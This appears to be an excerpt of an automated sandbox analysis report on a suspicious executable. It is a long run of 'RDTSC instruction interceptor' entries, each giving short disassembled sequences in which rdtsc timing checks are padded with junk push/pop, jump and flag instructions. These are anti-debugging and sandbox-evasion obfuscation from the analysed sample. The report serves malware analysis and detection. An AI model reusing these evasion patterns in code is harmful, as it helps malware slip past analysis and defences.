                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C03DB second address: 50C03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C03E8 second address: 50C041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 jmp 00007F0E6551CA3Eh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E6551CA47h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D015D second address: 50D0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0163 second address: 50D0169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0169 second address: 50D016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D016D second address: 50D0171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0171 second address: 50D018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E647B6081h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51008F0 second address: 51008F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51008F6 second address: 51008FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51008FA second address: 510091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E6551CA42h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510091B second address: 5100923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100923 second address: 5100954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 pushfd 0x00000007 jmp 00007F0E6551CA3Eh 0x0000000c and ecx, 73E991A8h 0x00000012 jmp 00007F0E6551CA3Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100954 second address: 510095C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0344 second address: 50E034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E034A second address: 50E034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E034E second address: 50E0394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c pushad 0x0000000d mov di, 28ECh 0x00000011 pushad 0x00000012 mov edx, 393A1E16h 0x00000017 mov bx, 05A2h 0x0000001b popad 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov di, ax 0x00000024 pushfd 0x00000025 jmp 00007F0E6551CA3Eh 0x0000002a sbb esi, 6E4C3238h 0x00000030 jmp 00007F0E6551CA3Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0518 second address: 50C051C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C051C second address: 50C0522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0522 second address: 50C0606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 5DC543B1h 0x00000008 pushfd 0x00000009 jmp 00007F0E647B607Eh 0x0000000e adc ecx, 27198588h 0x00000014 jmp 00007F0E647B607Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F0E647B6086h 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F0E647B6081h 0x0000002b jmp 00007F0E647B607Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007F0E647B6088h 0x00000037 adc cx, 8578h 0x0000003c jmp 00007F0E647B607Bh 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 call 00007F0E647B6084h 0x0000004a mov ch, 8Fh 0x0000004c pop edx 0x0000004d call 00007F0E647B607Ch 0x00000052 mov ebx, esi 0x00000054 pop eax 0x00000055 popad 0x00000056 mov ebp, esp 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F0E647B6086h 0x00000061 sbb cl, 00000068h 0x00000064 jmp 00007F0E647B607Bh 0x00000069 popfd 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C0606 second address: 50C060B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50C060B second address: 50C0610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0E52 second address: 50D0E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov cx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e jmp 00007F0E6551CA3Ch 0x00000013 pushfd 0x00000014 jmp 00007F0E6551CA42h 0x00000019 xor ecx, 39FA8AF8h 0x0000001f jmp 00007F0E6551CA3Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esp], ebp 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c mov di, B8D4h 0x00000030 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0E9C second address: 50D0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebp, esp 0x00000007 jmp 00007F0E647B6086h 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0E647B607Ah 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0EC8 second address: 50D0ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D0ECC second address: 50D0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0152 second address: 50E0163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E0163 second address: 50E0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100011 second address: 5100045 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E852h 0x00000007 mov al, bl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007F0E6551CA3Ah 0x00000014 pop esi 0x00000015 popad 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0E6551CA43h 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100045 second address: 510004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510004B second address: 510004F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510004F second address: 5100053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100053 second address: 5100068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E6551CA3Ah 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100068 second address: 510007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E647B607Eh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510007A second address: 51000A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E6551CA45h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51000A4 second address: 510013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0E647B607Ch 0x00000011 sbb si, F7E8h 0x00000016 jmp 00007F0E647B607Bh 0x0000001b popfd 0x0000001c mov di, cx 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 push eax 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 pushad 0x00000029 call 00007F0E647B6084h 0x0000002e push esi 0x0000002f pop ebx 0x00000030 pop esi 0x00000031 push ebx 0x00000032 movzx eax, bx 0x00000035 pop edi 0x00000036 popad 0x00000037 mov eax, dword ptr [76FB65FCh] 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f movsx edx, ax 0x00000042 pushfd 0x00000043 jmp 00007F0E647B6088h 0x00000048 jmp 00007F0E647B6085h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510013E second address: 51001AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA47h 0x00000009 jmp 00007F0E6551CA43h 0x0000000e popfd 0x0000000f mov ecx, 265F3A4Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test eax, eax 0x00000019 jmp 00007F0E6551CA42h 0x0000001e je 00007F0ED7350213h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx edi, ax 0x0000002a jmp 00007F0E6551CA46h 0x0000002f popad 0x00000030 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51001AC second address: 5100212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E647B6081h 0x00000009 sub esi, 5D93C646h 0x0000000f jmp 00007F0E647B6081h 0x00000014 popfd 0x00000015 call 00007F0E647B6080h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ecx, eax 0x00000020 pushad 0x00000021 mov al, dl 0x00000023 movzx eax, dx 0x00000026 popad 0x00000027 xor eax, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E647B6087h 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100212 second address: 5100288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E6551CA3Fh 0x00000009 sbb ecx, 0DBE2F8Eh 0x0000000f jmp 00007F0E6551CA49h 0x00000014 popfd 0x00000015 mov edx, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and ecx, 1Fh 0x0000001d jmp 00007F0E6551CA3Ah 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F0E6551CA3Dh 0x0000002d xor esi, 2FBE3276h 0x00000033 jmp 00007F0E6551CA41h 0x00000038 popfd 0x00000039 mov eax, 40039567h 0x0000003e popad 0x0000003f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100288 second address: 510028D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510028D second address: 5100293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0065 second address: 50B009E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushfd 0x00000008 jmp 00007F0E647B6082h 0x0000000d or ecx, 5F694278h 0x00000013 jmp 00007F0E647B607Bh 0x00000018 popfd 0x00000019 pop ecx 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e movsx edi, ax 0x00000021 push eax 0x00000022 push edx 0x00000023 mov bx, ax 0x00000026 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B009E second address: 50B00E1 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 pushfd 0x00000012 jmp 00007F0E6551CA43h 0x00000017 or ah, FFFFFF9Eh 0x0000001a jmp 00007F0E6551CA49h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B00E1 second address: 50B00E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B00E8 second address: 50B011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007F0E6551CA44h 0x0000000d mov dword ptr [esp], ecx 0x00000010 pushad 0x00000011 mov eax, 00CD269Dh 0x00000016 mov di, ax 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0E6551CA3Bh 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B011F second address: 50B0125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0125 second address: 50B01C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E6551CA3Eh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 call 00007F0E6551CA3Ch 0x00000016 pop ecx 0x00000017 call 00007F0E6551CA3Bh 0x0000001c pop ecx 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F0E6551CA49h 0x00000024 and esi, 645594A6h 0x0000002a jmp 00007F0E6551CA41h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebx, dword ptr [ebp+10h] 0x00000034 pushad 0x00000035 mov esi, 3D464273h 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c jmp 00007F0E6551CA42h 0x00000041 push eax 0x00000042 pushad 0x00000043 movsx edi, si 0x00000046 popad 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F0E6551CA42h 0x0000004f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B01C4 second address: 50B0215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3DD13184h 0x00000008 movsx edx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F0E647B607Ch 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f jmp 00007F0E647B6080h 0x00000024 push eax 0x00000025 pushad 0x00000026 mov di, 6C14h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E647B6083h 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0215 second address: 50B0221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0221 second address: 50B0227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0227 second address: 50B0269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6853F16Ah 0x00000008 jmp 00007F0E6551CA3Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F0E6551CA44h 0x00000019 and al, 00000058h 0x0000001c jmp 00007F0E6551CA3Bh 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 mov di, cx 0x00000027 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0269 second address: 50B02FF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E647B6082h 0x00000008 sbb esi, 6A4143B8h 0x0000000e jmp 00007F0E647B607Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 je 00007F0ED66343F8h 0x0000001d jmp 00007F0E647B6086h 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F0E647B607Eh 0x00000030 xor eax, 36A41D48h 0x00000036 jmp 00007F0E647B607Bh 0x0000003b popfd 0x0000003c jmp 00007F0E647B6088h 0x00000041 popad 0x00000042 je 00007F0ED66343B0h 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov dl, FBh 0x0000004d push esi 0x0000004e pop ebx 0x0000004f popad 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B02FF second address: 50B0311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Eh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0311 second address: 50B0315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0315 second address: 50B03CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c call 00007F0E6551CA3Dh 0x00000011 jmp 00007F0E6551CA40h 0x00000016 pop esi 0x00000017 push edx 0x00000018 mov di, cx 0x0000001b pop eax 0x0000001c popad 0x0000001d or edx, dword ptr [ebp+0Ch] 0x00000020 pushad 0x00000021 mov cx, di 0x00000024 push ebx 0x00000025 pop ecx 0x00000026 popad 0x00000027 test edx, 61000000h 0x0000002d jmp 00007F0E6551CA49h 0x00000032 jne 00007F0ED739AD50h 0x00000038 jmp 00007F0E6551CA3Eh 0x0000003d test byte ptr [esi+48h], 00000001h 0x00000041 pushad 0x00000042 mov si, C57Dh 0x00000046 pushfd 0x00000047 jmp 00007F0E6551CA3Ah 0x0000004c jmp 00007F0E6551CA45h 0x00000051 popfd 0x00000052 popad 0x00000053 jne 00007F0ED739AD2Ah 0x00000059 jmp 00007F0E6551CA3Eh 0x0000005e test bl, 00000007h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B03CA second address: 50B03E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B03E7 second address: 50B03F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E6551CA3Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B03F7 second address: 50B03FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0814 second address: 50A083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E6551CA43h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edx, 3E36A082h 0x00000016 mov eax, edx 0x00000018 popad 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A083B second address: 50A0864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E647B607Eh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0864 second address: 50A0890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 jmp 00007F0E6551CA3Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F0E6551CA3Eh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0890 second address: 50A0894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0894 second address: 50A08B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A08B1 second address: 50A0906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E647B6081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov edx, ecx 0x0000000f push eax 0x00000010 mov dx, AB5Ah 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 jmp 00007F0E647B607Eh 0x0000001c push eax 0x0000001d jmp 00007F0E647B607Bh 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0E647B6085h 0x0000002a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0906 second address: 50A090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A090C second address: 50A0910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0910 second address: 50A098B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E6551CA43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F0E6551CA46h 0x00000011 push eax 0x00000012 pushad 0x00000013 movsx edx, cx 0x00000016 pushad 0x00000017 movzx eax, di 0x0000001a jmp 00007F0E6551CA45h 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007F0E6551CA3Eh 0x00000027 mov esi, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E6551CA47h 0x00000031 rdtsc
